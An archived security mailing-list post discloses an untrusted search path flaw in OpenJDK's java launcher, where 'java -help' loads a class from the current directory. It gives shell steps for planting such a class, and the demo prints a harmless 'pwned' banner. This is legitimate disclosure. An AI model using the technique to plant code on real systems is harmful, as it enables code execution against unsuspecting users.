Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 13 Jun 2017 17:23:13 +0200
From: Jakub Wilk <>
Subject: OpenJDK: java(1): untrusted search path

Running "java -help" can load code from a subdirectory of cwd:

    $ javac
    $ mkdir -p sun/launcher/resources/
    $ mv launcher_en.class sun/launcher/resources/
    $ java -help
    < pwned >
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

This happens because:

* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar 
was specified), java sets "." as the user class path:

* The help message is apparently supposed to be internationalized.

* The Java's localization machinery loads classes:

On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar 
files) is affected. It contains the following code:

    if java -d32 2>&1 | grep "does not support" > /dev/null; then

On 32-bit systems, this causes java to print the help message.

Jakub Wilk

View attachment "" of type "text/x-java" (413 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ